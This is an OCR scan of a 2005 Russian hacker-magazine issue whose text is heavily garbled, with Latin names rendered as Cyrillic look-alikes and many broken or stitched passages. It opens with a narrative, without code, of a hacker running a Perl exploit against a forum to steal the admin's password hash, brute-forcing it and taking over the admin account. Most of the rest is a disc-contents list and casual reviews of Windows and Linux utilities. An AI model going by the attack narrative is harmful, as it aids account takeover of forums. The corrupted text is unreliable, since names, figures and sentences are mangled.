\л/огб,1 ,1 ,1 ,1 ,1 ,1 ,1 ,1 ,іб,1 +1гопи-рго1і!ез+ѵѵІтегеч-ігі=$і 
б/*. Узнав об этой ошибке, хакер устремляется 
проверить найденную уязвимость на деле. Для 
начала он находит через поисковик потенциаль- 
ную жертву, после чего сливает сплоит от ВЗТ к 
себе на тачку. Компилить его не приходится, 
поскольку он написан на перле, достаточно 
просто запустить скрипт. Эксплойт требует сле- 
дующих параметров: в начале указывается 
хост, который будет атакован, после — имя пап- 
ки, в которой находится форум, и наконец, ста- 
вится іб того пользователя, пароль которого 
взломщик хочет украсть. Итак, наш хакер запус- 
кает сплоит и... Да! Форум сдался и выплюнул 
МД5-ХЭШ админа прямо в хаксора :) Теперь сете- 
вой негодник приступает к расшифровке хэша. 
В этом ему поможет утилита гпббіпзібе, о кото- 
рой, думаю, ты уже немало наслышан. Выбрав 
нужный формат возможного пароля, он запуска- 
ет брут, ставит его в бэкграунд и уходит спать... 
На следующий день, ха- 




форса, видит, что все пароли, которые он загру- 
зил, удачно подобрались. Теперь дело остается 
за малым. Он устремляется на главную страни- 
цу форума и находит форму ввода имени поль- 
зователя и пароля. Судорожно вводит обручен- 
ные данные и нажимает «Зайти». После неболь- 
шой паузы он удачно залогинивается под адми- 
ном. Теперь ему открыта дорога к большим де- 
лам! В админке форума можно пользоваться 
множеством различных вкусностей. Например, 
можно изменять темы форума, установить лю- 
бому пользователя бан, или поменять пароли 
всем админам и пользователям, что ничего хо- 
рошего думаю, не принесет. Одним словом, ха- 
кер становится богом на форуме, или полноцен- 
ным админом, который очень зол и свиреп © 




кер, проверяя результат 
начатого вчера брут- 
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Ртее Рісіите Ріпбет 3.41 


СбескМаіІ 2.5.2 


Редізігу Мападет 4.00 Веіаі 


ТазкЬатНібеІ.28 


АІІеп Вкіп Еуе Сапбу 5 




СтаскОоипІоабет 2.2 


МісгозойѴѴІпбоиз Ветѵег 


Раззшотб Ваѵет 2.2.1 


РІазб ЕірВупс Випбіе 1.0.1 
Мадіс ІВО Макет 


ОЕѴЕЕОРМЕМТ 


АІІетѴѴІпб Еод Апаіугет 


2003 Регіоггпапсе Абѵізот 


ТазкВшіІсЬХР 2.0.6 


ИіпАзгпВІибіо 5.0.4 


5бор-5стір11.1 


АЬехо Мегпоту 


Х-5е1ир Рто 7.1 


ІгпТОО АѴІ МРЕЙ 


Мазгп32 8.2 


РоІбетВІіате 2.5.4 


Нізіоту Виеерет 2.54 


РошетАгсЬіѵет 9.25.02 


^NIX 


ѴВ бесотріІетѵО.4 


ЕѵіІЕутісз 0.1.8 РСЗ 


ІпдВоІІ Відп 01 Мізегу 2.7 


1Д/іп32Раб 1.5.8 


МЦЕТІМЕОІД 


ОЕѴЕЕОРМЕМТ 


МЕТ 


КІагпАѴ 0.22 




РѴѴѴМ 2.5.13 


ВстіЬиз 1.3.0 


РошетОНВ 2.9.18 


Каі О.б.ОЬеІаІ 




НетоЕіпих 2.0.0.2 


СобеРотде 4.5 


МохіІІаТбипбетЫтб 1.0.6 


Тгизііх Весите Еіпих 3.0 




дшепѵіеш 1.2.91 


РНР 4.4 


ОрепВВЕ 0.9.8 


ВІах Ртобо Ебіііоп 5.0.6 




МизЕ 0.7.2рте2 


вес 4.0.1 


РітешаІІ Виіібет 2.0.8 


ВНОМЕ 2.10.2 




ЕММВ О.І.ОЬеІа 


014.0 


РВВОи1 1.1.3 






КІзо 0.8.2с 


ЕуХ 1.3.6 




МІ8С 




ОРахРеабет 0.3с 


Техтакет1.2 


8Ѵ8ТЕМ 


КМуМопеу 0.7.4 




Ртадііѵе 0.3.0 


етісЗ 3.7.1 


Еіпих 2.6.1 2.3 


КЗОВиЛ 0.5.0 
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ѴІЗУАІ НАСК ++ 

Дефейс сайта через баг 
в форуме рипВВ 
Прохождение июльского 
конкурса 



РОР АРІСНІѴЕ 

][ДКЕР 

][акер2005-06 (78) 

][ДКЕР СПЕЦ 

][акер Спец 2005 - 06 (55) 

ЖЕЛЕЗО 

Железо 16 (06) 



МС 

МоЬІІе Сотроіегз 06 (57) 



МА0А2ІМЕ 

ШДР0ѴѴДНЕ2 

НООІИе 2.5.69 

ОезкТооІ 3.0 Внііб 153 

Кеіеазе 

ВреебРап 4.24 

Поипіоаб Мазіег 4.2.4.887 

ВгебЗ 

ТС00Е2.17 

Домашняя бухгалтерия 
4.0.8.5 
Наге 1.5.1 
ВП Меіег 3.07 
ВауезІІ! 0.8.1 

ВРОАТЕВ 

Обновления 
антивирусных баз АѴР 
ѴѴІп нрбаіез 



Аніотоііѵе ІД/оІІ 4.49 
ІВІЯТ2 

ВМВ Весерііоп Сеп1ег1.15 
РІазб Моѵіе Ехігасіог 
Всоиіі.95 
РеебЕбіІогІ.6 
ВІгокеІІ 0.9.5 
Озепеиипкіе 3.5.5 

ЦЫІХѴѴДПЕ2 

Сеіезііаѵ 1.3.2 
Вѵеп V 0.4.2 
теіготарѵ 0.1.0 

ТЕІАЗН 

Демки 



Раддіе ѵ 0.4.1 
багкйПрб V 1 .2 
Міпітит Ргоіііѵ 3.3.14 



Х-Т00Е2 

ВТСЕІІе Віедо 3.1 
83ідпз ЕігешІІ 
Редізігу Тгазй Кеуз Ріпбег 
3.6.1 

ІЧеІТооІзЗ.І 
ІпѵізіЫе Вгоизіпд 



ЛУЧШИЕ 

ЦИФРОВЫЕ 

КДМЕРЫ 

Лучшие цифровые 
камеры 09 





ПОКА БЕССМЕННЫЙ ВЕДУЩИЙ ШАРОВАРЕЗА НАХОДИТСЯ НА ЗАСЛУ- 
ЖЕННОМ ОТДЫХЕ И ИЗО ВСЕХ СИЛ БЬЕТ БАКЛУШИ, Я ВОСПОЛЬЗУЮСЬ 
ПОДВЕРНУВШИМСЯ СЛУЧАЕМ И РАССКАЖУ ВСЕМ ПРО НЕ САМЫЕ ИЗВЕ- 
СТНЫЕ И ПОДЧАС НЕЗАМЕТНЫЕ ПРОГРАММЫ, ЗДОРОВО ОБЛЕГЧАЮЩИЕ 
ЖИЗНЬ ЛЮБОМУ ЛЮБИТЕЛЮ ПОСИДЕТЬ ЗА КОМПОМ. ХОЧУ ПРЕДУПРЕ- 
ДИТЬ СРАЗУ: ЛЮБАЯ ИЗ ПРОГРАММ В ЭТОМ ОБЗОРЕ ПРОЖИЛА НА МОЕМ 
ДОМАШНЕМ КОМПЬЮТЕРЕ НЕ МЕНЬШЕ ГОДА И НЕ БЫЛА СНЕСЕНА. ТО 
ЕСТЬ, НИЖЕ ТЫ НАЙДЕШЬ 10 ПРОГРАММ, ПРОВЕРЕННЫХ В САМЫХ ЖЕС- 
ТОКИХ УСЛОВИЯХ ЭКСПЛУАТАЦИИ И НЕ РАЗОЧАРОВАВШИХ МЕНЯ :). 




Ья о бекапе данных на своих личных 
Гого момента, когда в связи с бѳзвре- 
винта бекапить уже становится нече- 
бли тоже настулил и с тех пор некоторое 
рнности своих данных уделяю. Профи- 
амые, всегда обходится дешевле вос- 
рля. И первое дело на пути сохранности 
рра — это мониторинг состояния винта. 
То|и смысле имеет массу достоинств: реаль- 
ная простота в использовании, наглядное отображение 
инфы о состоянии здоровья и уровня жизни твоих НОР, 
причем технология ОизШоѵѵ! протестирует диски мгно- 
венно и покажет уровень здоровья и производитель- 
ности в процентах относительно нового диска. Прог- 
рамма будет мониторить твои винты постоянно, не 
привлекая к себе излишнего внимания, но следя за тем, 
чтобы винт не «крякнул» невзначай. НООІІІе использует 
в своей работе технологию З.М.А.В.Т. (ЗМАВТ) — осо- 
бую систему самоди- 
агностики жестких 
дисков, которая пос- 
тоянно анализирует 
состояние диска во 
время работы и сооб- 
щает о более чем 20 
разных контролируе- 
мых параметрах. 
НООІіІе в свою оче- 
редь тестирует все 
эти технические па- 
раметры и представ- 




ляет результат пользователю в упрощенной наглядной форме. От- 
дельная фишка программы — мониторинг температуры винчесте- 
ров. Производители программы утверждают, что при увеличении 
температуры диска всего на ІСС его производительность падает 
почти в 2 раза! Теперь приятные мелочи: у проги есть русский интер- 
фейс и возможность удаленного оповещения о проблемах. В теку- 
щей версии поддерживаются ЮЕ, Зегіа! АТА, ЗСЗ! диски на стан- 
дартных контроллерах, внешние, ЮЕ ВАЮ и ЗСЗ! ВАЮ контролле- 
ры не поддерживаются. 

ОезкТооІ 3.0 ВиіІсІ 153 Кеіеазе 

ѴУІпбоѵѵз 95/98/МТ/2000/МЕ/ХР/2003 

Зіге: 547 Кб 

ЗИагеѵѵаге - 

ѵѵѵѵѵѵ.теіаргосіисіз.сот 

Этой программой я пользуюсь каходый день, обращаясь к ней по несколько 
раз за час. Искал я такую софтинку и выбирал примерно из полутора десят- 
ков аналогов довольно долго. В итоге нашел и использую с особым циниз- 
мом. ОезкТооІ — это всего-навсего панель всяческих инструментов для раз- 
мещения на рабочем столе, что ясно из названия программы. На панель 
мо>кно помесптть любые ссылки на установленные в системе программы, 
особенно полезно повесить туда ярлыки десятка-другого софтин, которыми 
ты пользуешься наиболее часто. Функция Огад апсі Огор поддерживается, 
все очень просто настраивается, в том числе и с использованием скинов. 
Сама панель «лепится» к одной из сторон экрана (у меня — сверху) и как 

только ты подводишь мышиный кур- 
сор к самому краю экрана — акку- 
ратно выезжает навстречу новому 
заданию. После клика по нужному 
ярлыку — аккуратно уезжает назад 
(скорость приеадаютьезда настраи- 
вается) и никак тебя не беспокоит до 
следующего обращения. Пользова- 
ние панелькой экономит приличное 
количество времени и избавляет от 
лишних мышиных кликов. 




[хакер 08 [ 80 ] 05 > юниты 145] 
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8реес1Рап 4.24 

ѴѴІпсІоѵѵз Эх/МЕ/МТ/2000/2003/ХР 

Зіге: 1373 Кб 

Ргееѵѵаге 

ѵѵѵѵѵѵ.аІтісо.сот/зреесІІап.рИр 



Довольно странно, что разработчик 
не требует за свое творение денег. 

Вообще. Никаких. А между тем, 
программа ЗреесІРап нужна в хо- 
зяйстве любого, даже самого 
скромного и начинающего овѳркло- 
кера. Мой домашний компьютер ра- 
зогнан повсеместно, поэтому к воп- 
росу мониторинга температуры и 
режимов работы кулеров я отно- 
шусь со всей серьезностью. Выб- 
ранная мной софтина, пристально 
следит за температурой всяческих 
системных устройств, оборудован- 
ных термодатчиками, меряет и 
отображает скорости вращения кулеров и мониторит напряжение, пода- 
ваемое на чипсет, и критически важные комплектующие. ЗреебРап уме- 
ет отображать температуру жесткого диска, если устройство со своей 
стороны поддерживает эту нужную функцию. Программа позволяет отс- 
ледить поведение вентиляторов и отрегулировать их поведение долж- 
ным образом, избавляя компьютерного гика от излишнего шума разно- 
образных «Карлсонов». Важно, что их скорость можно менять и вруч- 
ную, и автоматически. Отдельного восхищения заслуживает более чем 
внушительный и постоянно обновляемый список поддерживаемых ма- 
теринских плат и установленных на них термодатчиков. Информацию с 
датчиков можно наблюдать прямо в системном трее или настроить ее 
отображение так, как будет удобно именно тебе. Качай, не пожалеешь. 

ОоѵѵпІоасІ Мазіег 4.2.4.879 I 

ѴѴІпбоѵѵз 9х/Ме/ЫТ/2к/ХР ^ ^ Щ 

3126:2107 Кб Щ 

Ргееѵѵаге И 

ѵѵѵѵ\л/.ѵѵез1Ьу1е.сот/бт 





Писать, что Ооѵѵпіоаб 
Мазіег 4.2.4.879 — 
это «одна из лучших 
утилит для...» не мо- 
гу по двум простым и 
ясным причинам: во- 
первых, для меня 
она просто самая 
лучшая из опробо- 
ванных, а во-вторых, 
лучшее, как извест- 
но, — враг хорошего. 

Иначе говоря, вместо того, чтобы предаваться нудному сравнитель- 
ному тестированию по десятку параметров, я всего лишь пользуюсь 
программой, которая мне никаких проблем не создает вообще, а де- 
ло свое знает туго. Ооѵѵпіоаб Мазіег — это интернет-качок. Качает 
все. Имеет понятный и настраиваемый интерфейс, умеет сортиро- 
вать файле, всячески сигнализирует о текущих многопоточных за- 
качках (вместе с зеркалами), понимает скины, может самостоятель- 
но апдейтиться и работать по расписанию, соединяется через біаі-ир, 
ІЗОЫ, АОЗІ, ІАМ. Ведет логи, историю и генерит отчеты, дает воз- 
можность работы с командной строкой и позволяет послушать/пос- 
мотреть музыкальные и видео файлы в процессе закачки. При этом 
мониторит буфер обмена на предмет ссылок, интегрируется в брау- 
зеры Міегозой Іпіегпеі Ехріогег 4.0 и выше, Рігеіох, МогіІІа, Орега 4.0 и 
выше, Ыеізсаре Соттипісаіог 6.0 и выше, и вообще-то говоря явля- 
ется для меня лично незаменимым помощником. Рекомендую. 



ВгесІ 3 (текущая версия Ьеіа 3) 

ѴѴІпбоѵѵз 9х/Ме/ЫТ/2к/ХР 

Зіге: 580 Кб 

Ргееѵѵаге 

ѵѵѵѵѵѵ.азІопзбеІІ.ги/ЬгебЗ/іпбех.ИІтІ 



Самая старая программа и, наверное, самая для меня важная. Это 
именно тот текстовый редактор, в котором я написал практически 
все свои литературные шедевры для ][. Ничего удивительного в том, 



что Вгеб 3 стал очень популярен. 
Изначально редактор существо- 
вал в качестве альтернативы для 
стандартного виндового Блокно- 
та, про который я уже и забыл за 
его полной ненадобностью. Ре- 
дактор маленький, ОЧЕНЬ удоб- 
ный, имеет скромный, за счет че- 
го ПОНЯТНЫЙ и УДОБНЫЙ ин- 
терфейс, поддерживает наиболее распространенные кирилличес- 
ких кодировки (АМЗІ, КОІ8, ОЕМ, юникод) и умеет преобразовывать 
тексты между ними «на лету». Не имеет ограничений на размеры 
файлов (бывало, столько понапишешь, что всякие ворды лопались 
от напруги), поддерживает плагины. Сейчас автор программы при- 
нимает пожелания пользователей с тем, чтобы материализовать их 
и внедрить в программу, точнее, в ее финальную версию. Немало- 
важно и то, что для россиян (или выдающих себя за таковых) Вгеб 3 
был и будет бесплатным. Перед автором программы персонально 
снимаю шляпу за качество продукта и его описание. Спасибо за 
твой труд, уважаемый! 

ТСООЕ 2.17 

ѴѴІпсІоѵѵз 9х/Ме/МТ/2к/ХР 

Зіге: 332 Кб 

Ргееѵѵаге 

Ы1р://аІехЬоіко.пагосІ.ги/ргос1.1і1тІ 




Жизнь у меня такая, 
что получаю частень- 
ко всяческие пись- 
ма. Они бывают хо- 
рошие и разные, раз- 
ные обычно присы- 
лают в такой замыс- 
ловатой кодировке, 
что не разберешься. 
В связи со сложив- 
шейся обстановкой, 
обзавелся я мощ- 
ным перекодировщиков затейливых кракозябров в понятные вся- 
кому буквицы родного алфавита. ТСООЕ автоматически разбира- 
ется практически в любом «испорченном» тексте, понимая в том 
числе и многократно перекодированные послания. «Восстановле- 
ние производится путем перебора комбинаций перекодировок и 
распознаванием полученных слов с помощью быстрого эвристи- 
ческого алгоритма, основанного на особенностях построения слов 
русского языка. При восстановлении поддерживаются кодировки 
□ОЗ, ѴѴІпсІоѵѵз, КОІ-8, 130 8859-5, а также преобразование текста 
из форматов Вазе64, ІЛІЕ, ХХЕ, ОиоІесІ-РппІаЫе, ЯТР, НТМІ, ЫТР- 
8 и транслит», — пишет автор программы Алексей Бойко. И ведь 
верно пишет! Сама программа сидит себе тихонько в трее и ожи- 
дает, пока в нее не поместят текст из клипборда и не тыцнут в 
иконку. Если потребуется — осилит пакетную обработку файлов. 
Из великого множества перекодировщиков пользуюсь именно 
ТСООЕ, и пересаживаться на что-либо не желаю. Итого: быстро, 
надежно и удобно. 

Домашняя бухгалтерия 4.0.8.5 

ѴѴІпсІоѵѵз 9х/!ѴІе/МТ/2к/ХР 

Зіге: 3263 Кб 

ЗЬагеѵѵаге (300 рублей) 

Ы1р://кеерзо11.ги/1іотеЬи1і.Ыт 




Признаюсь честно — я жадный. В смысле — очень люблю веселые 
золотые баблонги и с большим пиететом отношусь к вопросу их на- 
копления. Хочу стать капиталистом, короче говоря. Всякий капита- 
лист и просто пользователь денег должен четко знать — что и куда 
он потратил. В этом деле незаменимо всяческое программное 
обеспечение. Другое дело — в бухгалтерском софте, даже самом 
простеньком, без пол-литра и такой-то матери в жизни не разоб- 
раться. Однако в Кеерзоіі сумели найти очень тонкую грань между 
полнофункциональностью, простотой работы и гибкостью. На выхо- 
де имеем удобный инструмент для ведения финансов. Штука по- 
лезная, говорю как юный бухгалтер с двухгодичным стажем :). Не 
желающие сходу вывалить 300 кровных рублей ради собственного 
будущего финансового благополучия, могут зайти на сайт програм- 
мы и качнуть бесплатную 30-ти дневную версию программы. Эта 




версия представляет 
собой полнофункцио- 
нальную программу. 

Единственным отли- 
чием от зарегистри- 
рованной копии явля- 
ется ее ограниченное 
время действия. А вот 
«химичить» с поиском 
альтернативных реги- 
страций и «лекарств» 
я лично в этом случае 
не стал бы: профукать 
свою финансовую историю — это очень обидно и неправипьно. 
Вниманию жадин прога предпагает: учет расходов и доходов, 
долгов, кредитов и процентов по ним, планирование трат, много- 
валютность и обмен валют, обновление курсов валют в интерне- 
те, фильтры и поиск по внутренней базе данных, экспорт данных 
в кучу разных форматов и программ, настройка интерфейса, бэ- 
кап данных, и самое интересное — всяческие наглядные графи- 
ки расходов и доходов. 

Наге 1.5.1 

УѴІПСІ0ѴѴ5 95/98/Ме/МТ/2000/ХР 

Зіге: 1,41 Мб 

ЗНагеѵѵаге — $24-$32 

ѵѵѵѵѵѵ.сІасИзІіипсІзоНѵѵаге.сот/іпсІех.ЫтІ 



На сайте программы 
всякий туда зашедший 
сможет вычитать, что 
программа Наге 1.5.1 
может увеличить быст- 
родействие некоего 
компьютера на 300%. 

И это чистая правда. 

Ведь «может» — это же 
не значит, что быстро- 
действие действитель- 
но увеличится. Увидев 
такое громкое заявле- 
ние, программу я кач- 
нул, решив, что после 
проверки на вшивость 
этот программный ускоритель может и не отправиться в треш. Итак, 
опережая все, расскажу, что Наге 1.5.1 действительно умеет в ряде 
случаев приносить в тесты быстродействия 15 — 40% дополнитель- 
ных попугаев. Программа довольно ловко оптимизирует работу цент- 
рального процессора и работу приложений, зачищает и оптимизиру- 
ет реестр, кое-где ускоряет 20 и 30-видео, имеет несколько проду- 
манных разработчиком «профилей» для желающих. Особенно ощу- 
тимы результаты деятельности программы при работе с графикой- 
цифрофото и во время игры в ненапряжные игрушки. Отдельно упо- 
мяну про Мет ОоиЫег — работника по зачистке загаженной всякими 
хвостами оперативки компьютера. Иной раз без этого совсем не 
обойтись. Приятно удивился, заметив, что переход машины в режи- 
мы НІЬегпаІѳ и Зизрепб стал более бодрым. 

ВауезІІ! 

ѴѴІпсІоѵѵз 95/98/983Е/ЫТ4.0/2000/ХР 

Зіге: варьируется, но примерно 200 Кб 

Ргееѵѵаге 

ѵѵѵѵ\л/.гі1ІаЬз.сот/гиЛііе_ЬаІ 



Ну, и в качестве последнего номера программной самодеятельнос- 
ти, покажу всем желающим несложный фокус, позволяющий сде- 
лать свою интернет-жизнь несколько спокойнее и веселее. Точнее 
говоря, речь пойдет об избавлении от спама. Рассказывать, что та- 
кое спам и что такое почтовый клиент ТбеВаІ! считаю совершенно 
излишним, однако был я тут недавно более чем сильно удивлен, уз- 
нав, что далеко не все, хотя бы краем уха слышали про такую «при- 
паду» к «Бате», которая называется «антиспаммерским фильтром 
ВауезІІ!». Подробно о работе фильтра читать вот здесь: ШрУ/кІігклагосІ.ги/ 
ивеіиІз/Ьауевіі.Мт. Вкратце: плагинчик ВауезІІ! действительно на- 
дежно защищает от гор спама, высыпающегося в мой рабочий поч- 
товый ящик, используя статистическую фильтрацию по методу то- 
варища Байеса. Фильтр входит в стандартный комплект поставки 



ТбеВаІ! 3.0. После ус- 
тановки и несложной 
активации програм- 
мы, фильтр будет ста- 
рательно присваивать 
рейтинги входящим 
письмам. Есть «чер- 
ные» и «белые» спис- 
ки. Включив пара- 
метр «беіеіе а тез- 
заде Іо Фе Зипк Ыбег 
I? Фе зсоге із дгеаіег 
Феп» можно ожидать, 
что при указанной величине, письмо будет удалено с сервера без 
закачки в локальную почтовую базу. Но самое главное — это нау- 
чить фильтр отделять хорошие письма от плохих. Для этого надо 
отдать команду фильтру просканировать папки с корреспонденци- 
ей, где есть и нужные письма, и вездесущий спам. Несколько таких 
лекций — и мой фильтр начал уверенно отфильтровывать всякий 
информационный мусор, сваливая его в специально оборудован- 
ную помойку и не мешая мне спокойно работать, в том числе и над 
собой. А спаммеров мы все-таки научим албанскому! 

Р.З. Ну и еще, чтобы два раза не вставать, расскажу, как я за- 
борол спаммеров в ІСО. Познакомился я под видом покупателя 
очередной массовой рассылки с одним очень активным спамме- 
ром и выведал у него, что все списки с номерами асек для их 
грязных рассылок формируются исходя из понятия «целевая ау- 
дитория». Спаммеры учитывают множество параметров — пол, 
возраст, хобби, но первое, на что они обращают внимание, — 
это страна проживания и языки. Ведь глупо же посылать инду- 
су, говорящему на голландском, рекламные сообщения на рус- 
ском языке? Потому в своих асечных деталях я немедленно про- 
писал ЗепедаІ и Огеаі Вау Сііу и «забыл» указать русский язык 
в качестве знакомого. Сразу же после этого я забыл о спамме- 
рах, то и дело славших мне всякое. Так что делай, как я, — пе- 
реселяйся в Сенегал :). 

Аиіотоііѵе ѴіоИ 4.49 

ѴѴІпсІоѵѵз 95/98/Ме/2К/ХР/2003 

Зііагеѵѵаге 

Зіге: 6894 КЬ 

ѵѵѵѵѵѵ.ІопеѵѵоІі-зоНѵѵаге.сот 



Мне всегда хотелось быть крутым волком автолюбительства, 
скалить клыки на любые проблемы и знать всегда правильное 
решение. Очевидно, в детстве было поглощено мало кальция, 
так что надлежащей крепости клыков не вышло. Мне и подоб- 
ным обделенным приготовили специальный софт, который обе- 
щает превратить любого лузера в автомобильного монстра. 
Здесь представлен удобный дневник автомобилиста, который 
поможет грамотно распланировать все нужные процедуры и 
ремонт твоего четырехколесного друга. Увы, данная софтина 
не знакома с чудесами отечественного автопрома и их специ- 
фическими прихотливостями. Однако прога обладает неплохой 
базой иномарок, по теме которых выдаст десятки бесценных 
советов. Прога довольно редкая, так что кряков-витаминов в 
Сети не разыскать. 
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еЗігеІІ 1.2 

ѴѴІпсІоѵѵз 2К/ХР (нужен .Меі) 

ЗНагеѵѵаге 

ЗІ2ѳ: 774 КЬ 

ѵѵѵѵѵѵ.ІгодіооІз.сот/езігеИ 



емых роликов. Самой же крутой опцией мне показалась та, что поз- 
волит поставить любую флешку в качестве обоев рабочего стола. 
Стоит отметить, что помимо стандартного ІЕ софт очень дружен с 
Мо 2 ІІІа РігеЬх и Орега'ой. 

РеесІЕсІіІог 1.5 



в мою бытность веду- 
щего рубрики РАО од- 
ним из наиболее горя- 
чих вопросов был «Как 
уменьшить размер кар- 
тинок?». РІе хочу поку- 
шаться на хлеб ны- 
нешнего ведущего — 

Зіер'а, но описанием 
новой проги снова от- 
вечу на наболевший 
вопрос. Самым прос- 
тым решением казал- 
ся Місгозой Ітаде ВезІ 2 ег, который дружит с ѴѴІпХР и доступен фриш- 
но в РоѵѵегРаск'е от М3. Однако детище М3 оказывается не совсем 
дружно с компонентами РИоІозбор, так что функция изменения каче- 
ства и разрешения изображений становится нерабочей после установ- 
ки АбоЬе-продукта. Предлагаемый же здесь образец вполне способен 
на мирное сожительство с фотошопом. Приятной отличительной осо- 
бенностью остается возможность выставить желанное качество кар- 
тинки. Все это тот же М3 РезІ 2 ег не умел вовсе! 




\Л/іпбоѵѵз 95/98/Ме/2К/ХР/2003 

ЗЬагеѵѵаге 

ЗІ 2 е: 1700 КЬ 

ѵѵѵѵѵѵ.ехІгаІаЬз.сот 



Самая модная технология послед- 
него времени — ВЗЗ. Темпы роста 
подписки на новостные ІеесІ'ы в де- 
сятки раз опережают наращивание 
читательской базы бумажных га- 
зет и журналов. Многим хочется 
создать свою ВЗЗ-кормушку. 
Создать — еще полбеды, но редак- 
тировать... С нерадивым ХМЕ на 
5-1- справляется РеесІЕсІіІог. Он умеет создавать !еес1'ы в разных доступ- 
ных форматах. Здесь также под рукой имеется простой графический ре- 
дактор, а для локальщиков и искателей анонимности — поддержка ра- 
боты с проксями. С подобной простой софтиной ты понимаешь, что ос- 
таваться в стороне от прогресса — просто непростительно ;). 




81гок .9.5 



8М8 Кесерііоп Сепіег 1.15 

ѴѴІпсІоѵѵз 95/98/Ме/2К/ХР/2003 

Збагеѵѵаге 

ЗІ 2 е: 1326 КЬ 

ѵѵѵѵѵѵ.зѵѵ4те.сот 



Сложно найти личность, более 
склонную к манипулированию, 
чем администратор. Тебе не 
только хочется крутить и вертеть 
системой, сидя перед монитором, 
но и в любой другой комфортный 
для тебя момент. С помощью 
ЗМЗ Весерііоп Сѳпеіг'а ты смо- 
жешь рулить системой, просто 
посылая СМСки. Получив твою 
мессу, система сумеет залупить необходимое по теме ЗОЕ, разослать 
ЗМ'ы, выбросить адекватный рор-ир или пополнить лог-файл в соот- 
ветствии с заданными правилами. Можно настроить прогу так, что 
она будет иметь по отдельному сценарию для каждого отправителя 
ЗМЗ, так что даже в данном сквозь-анальном администрировании ты 
сохранишь желанную иерархию. Софт можно поставить как обычное 
ігау-приложение, так и настроить в качестве сервиса Винды. 

РІазИ Моѵіе Ехігасіог 8сои1 1 .95 



ѴѴІпсІоѵѵз 95/98/Ме/2К/ХР/2003 

Ргееѵѵаге 

ЗІ 2 е: 105 КЬ 

ѵѵѵѵѵѵ.ісЬглі.сот 



В борьбе с лишним весом я обза- 
велся дико слимовым ноутом. 
Глаза быстро привыкли к малень- 
кому экрану, но пухлые пальцы 
напрочь отказались от работы с 
карликовой клавиатурой! Писа- 
тельская диета, безусловно, по- 
лезна для мозга, но свыкнуться с 
отказом от любимых Ноі кеу'ев на 
клавиатуре — не было никакой 
возможности! Тут пришел на по- 
мощь ЗІгокеІІ, который помог за- 
менить все клавиатурные ключи на мышечные. Стало достаточно од- 
ного движения мыши, чтобы все закрутилось и завертелось. Конечно, 
тебе придется проявить не дюжую сообразительность, пытаясь найти 
разницу между мышиным движением «вверх-вниз-влево» и «вправо- 
вправо-вверх». Однако, найдя искомое, ты достигнешь нового уровня 
контроля над своим подопечным компом. 

^5епе1^ипкіе 3.5.0 

ѴѴІпсІоѵѵз 95/98/МѲ/2К/ХР/2003 
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ѴѴІпсІоѵѵз 95/98/Ме/2К/ХР/2003 


Ргееѵѵаге 


Збагеѵѵаге 


ЗІ 2 е: 400 КЬ 


ЗІ2ѳ: 1326 КЬ 


ѵѵѵѵѵѵ.изепеііипкіе.сот 
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ниѳ проблемы искателя — ЕІзепеі 



Пути поиска неисповедимы — 
Ооодіе, е-Оопкеу, ІРС (через 
раскеіпетз.сот, как водится). 
Потом приходят всякие нездоро- 
вые мысли, вроде покупки/под- 
писки на архивы новостей и гра- 
фики. Чтобы не возникало по- 
добных разорительных идей, на 
сцене появляется новое реше- 
Зипкіе, который перелопатит для 



Сейчас лето, и офис 
вятся особенно невы- 
носимы. Шансы стать 
маринованным огур- 
цом заметно повыша- 
ются. Поэтому летом 
работники особенно 
часто перебрасыва- 
ются линками на вся- 
кие занятные флеш- 
мульты. Так и хочется 
порой записать флеш- 
ку на Е)8В-флѳшку и 
после работы пока- 
зать домашним. Ан-нет, стандартные средства большинства браузе- 
ров этого не позволяют вовсе! Здесь помогает рассматриваемый 
плагин, который сложит все просматриваемое добро в файл форма- 
та зѵѵі. Сохраненное можно будет без труда перевести в исполняе- 
мые ехе'шники. Также можно просто снимать скрины с просматрива- 



тебя тысячи изепеі-конференций, чтобы нарыть необходимое. Мне 
сложно представить подобную процедуру, проводимую вручную. 
Даже зная линки на конфы, целостно посвященные твоей пробле- 
ме, можно потратить сутки, добывая нужный пост и комменты. По- 
мимо поиска «в реальном времени», программа умеет мониторить 
заданную комбинацию, выбрасывая результаты по ходу их появле- 
ния в Сети. Как и всякий ценный, но бесплатный софт, данный про- 
дукт имеет тенденцию перегрузки юзера рекламой. Если прога не 
прокатит, стоит попробовать МеѵѵзЕеесИег, который обладает схо- 
жими функциями и приятнее требовательному глазу. 









так и «дальнего за- 
рубежья») и опера- 
тивность их пополне- 
ния/обновления. Пос- 



Лицензия: ѲМЦ ѲРІ 



Изначально проект 8ѵеп задумывался как программа (с интерфей- 
сом ѲТК-н) для настройки дополнительных клавиш на мультимедий- 
ной клавиатуре. Однако на этом разработчики решили не останав- 



Зіге 



ѵѵѵѵѵѵ 



Зіге (в .Ьг2): 417 КБ 



бар://зѵеп.Ііпих.кіеѵ.иа 



сосредоточил Г] 
Система нави 
тируемой в ( 
от привычно] 
мической, пд 
ланово облд 
зѳр, отобра 
планет), к г 
кого «путей 
висимости ( 
ектом можнЯ 
ние/координі 
РоІІоѵѵіпд. Для 
це, что сущер 
ленной. «Поигі 
его темпов, пй 
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др. Количество о^ 
емо, а общее их ^ 
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* Архив с исходника 



8ѵеп V 0.4. 

Ыпих, *В30 
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предло- 
эраций, 
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со 



оасы, микрофон и^^^^^^тение 
уі^а, остан^ш^^^^^рий/пре- 

вре- 

^^^^^^^^^^^^Нгображаемый 

и место- 
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^^^^^^НрЯком случае показыва- 
^^^^ВНвычная полоса с отметка- 
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0 временем), однако пока их число 
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теіготар ѵ 0.0.9 



РОЗІХ ( ВЗО, Ііпих, Зоіагіз... 



Зіге (в . 02 ): 831 КБ 



пПр://теІготар.ап(ех.ги 



ицензия: ѲЫІ) ѲРІ 



чень 



давно многочисленные ѴѴІпбоѵѵз-пользователи рассказы- 
про чудо-программы, позволяющие находить оптималь- 
емени пути проезда от любой станции метрополитена до 
альтернатив этих решений никогда не искал, но и до 
іени не «натыкался», и вот она: теіготар — прос- 
оте, и написанная нашим соотечественником на 
анием руд1кн-2). Среди карт, включенных в стан- 
отар, схемы метро Москвы, Петербурга, Киева, 
качестве основы для схем были взяты разработ- 
ки другого российско- 
го проекта — рМеІго 
(аналогичная прог- 
рамма для ѴѴІпбоѵѵз). 
Эта совместимость 
обеспечивает доста- 
точно широкий диапо- 
зон доступных схем 
(представлены как 
города России и СНГ, 
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ле выбора станции отправления и пункта назначения, програм- 
ма выбирает наиболее быстрые способы проезда, перечисляя 
их в списке, и визуально выделяя выбранный. Предусмотрены 
